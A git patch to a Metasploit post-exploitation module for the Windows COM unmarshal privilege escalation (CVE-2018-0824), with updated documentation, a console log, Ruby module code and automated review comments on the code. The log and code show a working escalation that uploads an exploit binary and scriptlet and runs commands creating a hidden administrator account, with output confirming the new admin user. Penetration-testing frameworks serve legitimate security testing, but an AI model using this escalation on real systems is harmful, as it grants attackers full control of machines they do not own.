From 569c2e03c95759b606d4dd82d188dd6dd3cac456 Mon Sep 17 00:00:00 2001 From: bwatters-r7 Date: Tue, 23 Oct 2018 17:15:34 -0500 Subject: [PATCH] Fix exploit relics and documentation --- .../post/windows/escalate/unmarshal.md | 145 +++++++++++------- .../windows/escalate/unmarshal_cmd_exec.rb | 27 ++-- 2 files changed, 102 insertions(+), 70 deletions(-) diff --git a/documentation/modules/post/windows/escalate/unmarshal.md b/documentation/modules/post/windows/escalate/unmarshal.md index c3d266ada7..9edc4bc370 100644 --- a/documentation/modules/post/windows/escalate/unmarshal.md +++ b/documentation/modules/post/windows/escalate/unmarshal.md @@ -1,5 +1,7 @@ ## Overview -This is a post exploitation module for local privilege escalation bug which exists in Microsoft COM for windows when it fails to properly handle serialized objects. +This is a post exploitation module for local privilege escalation bug +which exists in Microsoft COM for windows when it fails to properly +handle serialized objects. * https://www.phpmyadmin.net/downloads/ * https://github.com/codewhitesec/UnmarshalPwn/ @@ -7,7 +9,7 @@ This is a post exploitation module for local privilege escalation bug which exis ## Module Options -"POCCMD" This command will be executed on successful exploitation.
+"COMMAND" This command will be executed on successful escalation.
"SESSION" The session to run this module on. ## Limitations @@ -19,7 +21,7 @@ If the system is not vulnerable, then payload will execute but new process will If you want to confirm the vulnerability before you add user or perform any other sensitive action. -1. `set POCCMD /s notepad.exe` +1. `set COMMAND /s notepad.exe` 2. `run` Confirmation: 
@@ -30,82 +32,117 @@ If you see notepad.exe running as SYSYEM then that is as indication of vulnerabl ## Usage ``` -meterpreter > getuid -Server username: PC2\test -meterpreter > sysinfo -Computer : PC2 -OS : Windows 10 (Build 17134). +meterpreter > sysinfo +Computer : WIN10X64-1703 +OS : Windows 10 (Build 15063). Architecture : x64 System Language : en_US -Domain : PSS -Logged On Users : 12 +Domain : WORKGROUP +Logged On Users : 2 Meterpreter : x64/windows -meterpreter > background -[*] Backgrounding session 2... +meterpreter > execute -f cmd.exe -i -H +Process 4868 created. +Channel 7 created. +Microsoft Windows [Version 10.0.15063] +(c) 2017 Microsoft Corporation. All rights reserved. -msf > use post/windows/escalate/unmarshal -msf post(windows/escalate/unmarshal) > show options +C:\Users\msfuser\Downloads>net user +net user -Module options (post/windows/escalate/unmarshal): +User accounts for \\WIN10X64-1703 - Name Current Setting - ---- --------------- -POCCMD /k net user msfuser msfpass /add && net localgroup administrators msf /add -READFILE c:\boot.ini -SESSION +------------------------------------------------------------------------------- +Administrator DefaultAccount Guest +msfuser +The command completed successfully. +C:\Users\msfuser\Downloads>exit +exit +meterpreter > background +[*] Backgrounding session 1... +msf5 post(windows/escalate/unmarshal_cmd_exec) > show options -msf post(windows/escalate/unmarshal) > set session 2 +Module options (post/windows/escalate/unmarshal_cmd_exec): + Name Current Setting Required Description + ---- --------------- -------- ----------- + COMMAND no The command to execute as SYSTEM (Can only be a cmd.exe builtin or Windows binary, (net user /add %RAND% %RAND% & net localgroup administrators /add ). + EXPLOIT_NAME no The filename to use for the exploit binary (%RAND% by default). + PATH no Path to write binaries (%TEMP% by default). + SCRIPT_NAME no The filename to use for the COM script file (%RAND% by default). 
+ SESSION yes The session to run this module on. -msf post(windows/escalate/unmarshal) > run +msf5 post(windows/escalate/unmarshal_cmd_exec) > set command 'net user /add egypt h@ks4shellz & net localgroup administrators /add egypt' +command => net user /add egypt h@ks4shellz & net localgroup administrators /add egypt +msf5 post(windows/escalate/unmarshal_cmd_exec) > set verbose true +verbose => true +msf5 post(windows/escalate/unmarshal_cmd_exec) > run [!] SESSION may not be compatible with this module. -[*] exe name is: oQT0yWT834.exe -[*] poc name is: sJ76Il3UGj.sct -[*] Reading Payload from file /usr/share/metasploit-framework/data/exploits/CVE-2018-0824/UnmarshalPwn.exe -[!] writing to %TEMP% -[+] Persistent Script written to C:\Users\test\AppData\Local\Temp\oQT0yWT834.exe -[*] Reading Payload from file /usr/share/metasploit-framework/data/exploits/CVE-2018-0824/poc_header -[!] writing to %TEMP% -[+] Persistent Script written to C:\Users\test\AppData\Local\Temp\sJ76Il3UGj.sct -[*] Reading Payload from file /usr/share/metasploit-framework/data/exploits/CVE-2018-0824/poc_footer -[*] Starting module... 
- -[*] Location of UnmarshalPwn.exe is: C:\Users\test\AppData\Local\Temp\oQT0yWT834.exe -[*] Location of poc.sct is: C:\Users\test\AppData\Local\Temp\sJ76Il3UGj.sct -[*] Executing command : C:\Users\test\AppData\Local\Temp\oQT0yWT834.exe C:\Users\test\AppData\Local\Temp\sJ76Il3UGj.sct -Query for IStorage +[*] Attempting to PrivEsc on WIN10X64-1703 via session ID: 1 +[*] exploit path is: C:\Users\msfuser\AppData\Local\Temp\hylZVjgbLrd.exe +[*] script path is: C:\Users\msfuser\AppData\Local\Temp\NCYcABO.sct +[*] command is: net user /add egypt h@ks4shellz & net localgroup administrators /add egypt +[*] Attempting to PrivEsc on WIN10X64-1703 via session ID: 1 +[*] Uploading Script to C:\Users\msfuser\AppData\Local\Temp\NCYcABO.sct +[*] Creating the sct file with command net user /add egypt h@ks4shellz & net localgroup administrators /add egypt +[*] script_template_data.length = 306 +[*] Writing 376 bytes to C:\Users\msfuser\AppData\Local\Temp\NCYcABO.sct to target +[*] Script uploaded successfully +[*] Uploading Exploit to C:\Users\msfuser\AppData\Local\Temp\hylZVjgbLrd.exe +[*] Exploit uploaded on WIN10X64-1703 to C:\Users\msfuser\AppData\Local\Temp\hylZVjgbLrd.exe +[*] Launching Exploit... +[*] Query for IStorage Call: Stat End: Stat Query for IMarshal Call: GetMarshalSizeMax -Unknown IID: {ECC8691B-C1DB-4DC0-855E-65F6C551AF49} 0000020CA320CDB0 +Unknown IID: {ECC8691B-C1DB-4DC0-855E-65F6C551AF49} 0000017F6C3E05B0 Query for IMarshal Call: GetUnmarshalClass Call: GetMarshalSizeMax Call: MarshalInterface - +[+] Exploit Completed +[*] C:\Users\msfuser\AppData\Local\Temp\hylZVjgbLrd.exe already exists on the target. Deleting... +[*] Deleted C:\Users\msfuser\AppData\Local\Temp\hylZVjgbLrd.exe +[*] C:\Users\msfuser\AppData\Local\Temp\NCYcABO.sct already exists on the target. Deleting... 
+[*] Deleted C:\Users\msfuser\AppData\Local\Temp\NCYcABO.sct [*] Post module execution completed +msf5 post(windows/escalate/unmarshal_cmd_exec) > sessions -i -1 +[*] Starting interaction with 1... +meterpreter > execute -f cmd.exe -i -H +Process 1780 created. +Channel 11 created. +Microsoft Windows [Version 10.0.15063] +(c) 2017 Microsoft Corporation. All rights reserved. -Confirmation -Back in Meterpreter Session - -meterpreter > shell -Process 3936 created. -Channel 185 created. -Microsoft Windows [Version 10.0.17134.1] -(c) 2018 Microsoft Corporation. All rights reserved. - -C:\temp\un>net user +C:\Users\msfuser\Downloads>net user net user -User accounts for \\PC2 +User accounts for \\WIN10X64-1703 ------------------------------------------------------------------------------- -Administrator DefaultAccount Guest -User msfuser sshd -sshd_server test WDAGUtilityAccount -The command completed successfully. +Administrator DefaultAccount egypt +Guest msfuser +The command completed successfully. + + +C:\Users\msfuser\Downloads>net localgroup administrators +net localgroup administrators +Alias name administrators +Comment Administrators have complete and unrestricted access to the computer/domain + +Members + +------------------------------------------------------------------------------- +Administrator +egypt +msfuser +The command completed successfully. + + +C:\Users\msfuser\Downloads> + +``` diff --git a/modules/post/windows/escalate/unmarshal_cmd_exec.rb b/modules/post/windows/escalate/unmarshal_cmd_exec.rb index a7904340a8..27aa347710 100644 --- a/modules/post/windows/escalate/unmarshal_cmd_exec.rb +++ b/modules/post/windows/escalate/unmarshal_cmd_exec.rb 
@@ -5,13 +5,11 @@
 require 'msf/core/post/common'
 require 'msf/core/post/file'
 require 'msf/core/post/windows/priv'
-require 'msf/core/exploit/exe'
-class MetasploitModule < Msf::Exploit::Local
- Rank = ExcellentRanking
+class MetasploitModule < Msf::Post
 include Msf::Post::Common
 include Msf::Post::File
- include Msf::Post::Windows::Priv
+# include Msf::Post::Windows::Priv
 def initialize(info = {})
 super(update_info(info,
@@ -58,7 +56,6 @@ class MetasploitModule < Msf::Exploit::Local
 def setup
 super
 validate_active_host
- @cmd_to_run = datastore['COMMAND']
 @exploit_name = datastore['EXPLOIT_NAME'] || Rex::Text.rand_text_alpha((rand(8) + 6))
 @script_name = datastore['SCRIPT_NAME'] || Rex::Text.rand_text_alpha((rand(8) + 6))
 @exploit_name = "#{exploit_name}.exe" unless exploit_name.match(/\.exe$/i)
@@ -73,16 +70,14 @@ class MetasploitModule < Msf::Exploit::Local
 password = Rex::Text.rand_text_alpha((rand(8) + 6))
 print_status("username = #{username}, password = #{password}")
 cmd_to_run = 'net user /add ' + username + ' ' + password
- cmd_to_run += ' > C:\\\\Windows\\\\Temp\\\\testoutput.txt'
 cmd_to_run += ' & net localgroup administrators /add ' + username
- cmd_to_run += ' >> C:\\\\Windows\\\\Temp\\\\testoutput.txt'
 print_status(cmd_to_run)
 return cmd_to_run
 end
 def validate_active_host
 begin
- print_status("Attempting to PrivEsc on #{sysinfo['Computer']} via session ID: #{datastore['SESSION']}")
+ print_status("Attempting to Run on #{sysinfo['Computer']} via session ID: #{datastore['SESSION']}")
 rescue Rex::Post::Meterpreter::RequestError => e
 elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}")
 raise Msf::Exploit::Failed, 'Could not connect to session'
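Review bot: The dropped mixin is left behind as commented-out code, `+# include Msf::Post::Windows::Priv`, directly under the two includes that stay; in a module header this reads as a pending decision rather than a removal. Delete the line, or if the point is to record why it went, replace it with a reason such as `# Msf::Post::Windows::Priv is not needed here: elevation is performed by the uploaded binary, not by this module`. None of the visible hunks calls a Priv helper, but the rest of the file is outside this view, so confirm before removing. The class body continues past the hunk.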
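Review bot: The `.exe` suffix check on the line after the removed assignment, `exploit_name.match(/\.exe$/i)`, anchors with `$`, which matches before an embedded newline rather than only at the end of the string, and EXPLOIT_NAME is an operator-supplied option that becomes the upload filename. Use the string anchor and the non-allocating predicate: `@exploit_name = "#{exploit_name}.exe" unless exploit_name.match?(/\.exe\z/i)`; the same applies if SCRIPT_NAME gets an equivalent check further down. setup's body continues past the hunk.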
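Review bot: `raise Msf::Exploit::Failed, 'Could not connect to session'` in validate_active_host still raises the exploit-side failure class after the parent was changed to Msf::Post in the first hunk, and `fail_with(Failure::BadConfig, …)` in the next file hunk relies on the same exploit conventions; confirm both resolve in a post module, otherwise the error path itself raises NameError and the intended message is lost. populate_command also still builds the command with `+` concatenation and an explicit `return`; an interpolated literal is clearer: `cmd_to_run = "net user /add #{username} #{password} & net localgroup administrators /add #{username}"`, then `print_status(cmd_to_run)` with the value as the method's last expression. Dropping the two `C:\\\\Windows\\\\Temp\\\\testoutput.txt` redirects also removes an artifact that was written outside the module's own cleanup, which is the right call. validate_active_host's body continues past the hunk.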
@@ -129,7 +124,7 @@ class MetasploitModule < Msf::Exploit::Local
 script_template_data = ::IO.read(local_script_template_path)
 vprint_status("script_template_data.length = #{script_template_data.length}")
 full_command = 'cmd.exe /c ' + cmd_to_run
- full_command = cmd_to_run
+ full_command = full_command
 script_data = script_template_data.sub!('SCRIPTED_COMMAND', full_command)
 if script_data == nil
 fail_with(Failure::BadConfig, "Failed to substitute command in script_template")
@@ -139,9 +134,11 @@ class MetasploitModule < Msf::Exploit::Local
 vprint_status('Script uploaded successfully')
 end
- def exploit
- if cmd_to_run.nil?
+ def run
+ if datastore['COMMAND'].nil?
 cmd_to_run = populate_command
+ else
+ cmd_to_run = datastore['COMMAND']
 end
 print_status("exploit path is: #{exploit_path}")
 print_status("script path is: #{script_path}")
@@ -159,20 +156,18 @@ class MetasploitModule < Msf::Exploit::Local
 vprint_status('Launching Exploit...')
 command_output = cmd_exec(exploit_path + ' ' + script_path)
 vprint_status(command_output)
- print_good('Exploit completed, wait for elevated session')
+ print_good('Exploit Completed')
 ensure_clean_destination(exploit_path)
-# ensure_clean_destination(script_path)
+ ensure_clean_destination(script_path)
 rescue Rex::Post::Meterpreter::RequestError => e
 elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}")
 print_good('Command failed, cleaning up')
 print_error(e.message)
 ensure_clean_destination(exploit_path)
-# ensure_clean_destination(script_path)
+ ensure_clean_destination(script_path)
 end
 end
- attr_reader :exploit_name
- attr_reader :cmd_to_run
 attr_reader :script_name
 attr_reader :temp_path
 attr_reader :exploit_path
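Review bot: `full_command = full_command` is a self-assignment left over from replacing the old `full_command = cmd_to_run` override; it does nothing and should simply be deleted rather than kept as a placeholder. Two lines down, `if script_data == nil` reads better as `if script_data.nil?`, and since `sub!` returns nil only when the `SCRIPTED_COMMAND` placeholder is absent, that check catches a broken template but says nothing about whether the substituted command is well-formed in it. The operator-supplied command is inserted without escaping; if the template is an XML-based scriptlet (the `.sct` extension in the earlier hunk suggests so), confirm that characters such as `<` or `"` in COMMAND cannot break the generated file, or document that limitation on the option. The enclosing method starts before the hunk.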
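Review bot: `if datastore['COMMAND'].nil?` treats an empty option value as a command to run: if the datastore can hold `''` (an option cleared rather than unset), it is not nil, populate_command is skipped and an empty command is written into the script. Checking for blank covers both cases and collapses the branch to one line: `cmd_to_run = datastore['COMMAND'].to_s.empty? ? populate_command : datastore['COMMAND']`. run's body continues past the hunk.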
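Review bot: Removing `attr_reader :exploit_name` at the end of the hunk breaks setup (hunk `@@ -58,7 +56,6`), which still calls `exploit_name` twice in `@exploit_name = "#{exploit_name}.exe" unless exploit_name.match(/\.exe$/i)`; unless another reader or method of that name exists beyond the three attr_reader lines shown, every run fails there with NameError before anything is uploaded. Keep `attr_reader :exploit_name`; dropping `attr_reader :cmd_to_run` is correct, since `@cmd_to_run` is no longer assigned anywhere visible. In the rescue branch, `print_good('Command failed, cleaning up')` reports a failure with the success marker; `print_warning('Command failed, cleaning up')` fits. The duplicated ensure_clean_destination pair in both branches could also move into a single `ensure` clause so the temporary binary and script are removed on any exit, not only on the two handled paths.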